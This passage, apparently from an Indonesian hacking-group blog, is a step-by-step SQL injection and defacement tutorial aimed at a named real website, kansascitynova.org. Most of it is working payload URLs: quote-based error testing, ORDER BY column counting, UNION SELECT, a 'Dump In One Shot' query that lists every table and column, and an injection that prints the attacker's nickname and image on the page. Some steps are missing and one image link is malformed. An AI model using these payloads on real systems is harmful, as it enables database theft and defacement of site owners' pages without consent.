2. Tambahin tanda ‘ dibelakang angka nya contoh http://kansascitynova.org/news.php?id=42’
3. Nanti jika muncul kata eror syntax bla bla bla berarti vuln langsung gass ae
4. Tambahkan perintah order by dan di belakang angka dan juga temukan angka erornya contoh:
http://kansascitynova.org/news.php?id=42’+order+by+1 –+- (tidak eror)
http://kansascitynova.org/news.php?id=42’+order+by+2 –+- (tidak eror)
http://kansascitynova.org/news.php?id=42’+order+by+5 –+- (tidak eror)
http://kansascitynova.org/news.php?id=42’+order+by+8 –+- (eror)
Nah disini gw nemuin angka eror nya 8 jika kalian belum nemu angka eror nya maka cari terus ampe dapet jangan nyerah semangat 🙂
5. Kemudian kita tuliskan perintah union select dan masukan angka eror nya dikurangi satu jadinya
http://kansascitynova.org/news.php?id=42’+union+select+1,2,3,4,5,6,7–+-
6. Lalu disitu keluar angka dios atau disebut togel nya 2 dan 5.Nah mimin pilih angka dios nya 2 aja deh karna berdu lebih mersa
kalian unggah foto kalian lalu salin code nya pastikan ubah jadi tautan penuh html seperti yang ada di contoh
9. ‘<img src =”https://angelscybermoon.blogspot.com/2020/06/link-gambar.com/gambar.jpg”>’ gunakan kode itu lalu salin link gambarr kalian contoh ‘<img src=”https://i.ibb.co/zhspcnQ/the-mighty-garuda-by-firnadi-d4hyxkf-fullview.jpg”>’ lalu simpan dulu ke tempat yang aman
10 . Kita beralih ke web nya tadi lalu kita dump tabel.Untuk melakukan dump table pada database kita gunakan query DIOS (Dump In One Shot) ,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x), contohnya
http://kansascitynova.org/news.php?id=42%27+union+select+1,concat(database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),3,4,5,6,7–+-
11. Woke kita langsung print nick & img kita.Kita pake perintah.Jangan lupa beri 0x pada
https://target.com/p?id=12’+UNION+SELECT+1,concat(0x496E6A6563746564204279204D722E4B4C41,'<br>’,'<img src =”https://angelscybermoon.blogspot.com/2020/06/link-gambar.com/gambar.jpg”>’,database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),3,4,5,6,7–+-
Contohnya :
http://kansascitynova.org/news.php?id=42%27+union+select+1,concat(0x496E6A6563746564204279204D722E4B4C41,%27%3Cbr%3E%27,%27%3Cimg%20src%20=%22https://i.ibb.co/zhspcnQ/the-mighty-garuda-by-firnadi-d4hyxkf-fullview.jpg%22%3E%27,database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),3,4,5,6,7–+-
12. Dan Boom !!!!
Sekian dari saya kalo ada yang mau ditanyakan komen aja
Happy Deface 🙂
Thanks To :
– Angels Cyber Moon
– Satanic Devil
– LolzSec X-PLOIT
– Malang Grey Hat
– Malang Cyber Army